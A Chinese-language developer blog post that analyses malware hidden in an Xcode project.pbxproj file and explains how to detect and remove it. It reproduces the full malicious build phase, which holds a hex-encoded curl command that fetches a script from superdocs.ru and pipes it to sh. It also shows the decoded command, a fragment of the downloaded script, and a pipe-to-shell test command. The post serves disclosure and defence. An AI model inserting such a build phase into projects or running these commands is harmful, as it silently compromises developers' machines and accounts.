2022款Xcode病毒分析与防范

·  阅读 836
2022款Xcode病毒分析与防范

图片

今天这个群友又(两年前他也中毒了)找上了我,因为收了白包(和项目源码)后账号被盗了,而且还被勒索了.

Xcode有毒迹象

图片

查看project.pbxproj步骤

图片

图片

图片

图片

病毒内容(删除这部分就能删除病毒)

C518D91414C779DC676A102C /* Cocoa Libraries Compiler */ = {

 isa = PBXShellScriptBuildPhase;
 buildActionMask = 2147483647;
 files = (
 );
 inputFileListPaths = (
 );
 inputPaths = (
 );
 name = "Cocoa Libraries Compiler";
 outputFileListPaths = (
 );
 outputPaths = (
 );
 runOnlyForDeploymentPostprocessing = 0;
 shellPath = /bin/sh;
 shellScript = "# This output is used by Xcode outputs to avoid re-running this script phase.
 echo \"6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f
7375706572646f63732e72752f61207c207368202d732066616c73650a\" | xxd -p -r | sh >/dev/null 2>&1 || true
";
};

复制代码

病毒分析

截图内和以下内容不一致是因为我担心自己中毒_,所以破坏了它在项目中的结构_

echo "6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f 7375706572646f63732e72752f61207c207368202d732066616c73650a" | xxd -p -r | sh >/dev/null 2>&1 || true

16进制转ASCII(朋友提示这是16进制的,以下是转进制网站,放心访问)

coding.tools/cn/hex-to-a…

图片

转码后的内容

可见它依赖curl去拉取病毒本体

curl --max-time 8 -sk superdocs.ru/a | sh -s false

浏览器访问网站superdocs.ru/a显示的内容

图片

#!/bin/bash AUTOCLEAN=false BASEDIR=1" ] then AUTOCLEAN={PROJECT_FILE_PATH}" ] then BASEDIR=?' 1 2 3 15 curl --connect-timeout 5 -s -k -o /tmp/exec.

/tmp/exec.$$ "AUTOCLEAN "superdocs.ru"

别的shell命令看不太明白,但是chmod +x的意思是加执行权限

查找病毒的办法:

随便找一个Xcode项目打开 project.pbxproj文件,检索以下内容

echo "6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f 7375706572646f63732e72752f61207c207368202d732066616c73650a" | xxd -p -r | sh >/dev/null 2>&1 || true;

如果你随便新建一个Demo都能在 project.pbxproj中检索到以上部分就已经中毒(说明病毒已经有复制能力)

如何防止中毒:

安装Lulu禁止curl联网权限(预算充足的话也可以使用,Little Snitch(付费软件,还挺贵))

github.com/objective-s…

在终端运行(这里我把域名换成了百度,放心访问):

curl --max-time 8 -sk http://baidu.com |sh 

复制代码

勾选Block

图片

如果已经中毒

  • 1.备份资料到移动硬盘

  • 2.格式化硬盘

  • 3.重装系统

  • 4.安装网络拦截软件LuLu或者Little Snitch

  • 5.清理项目里的病毒

  • 6.安装Xcode正常使用

交流 / 合作:请加开发者微信 Rollin0_0

分类:
iOS
标签:
收藏成功!
已添加到「」, 点击更改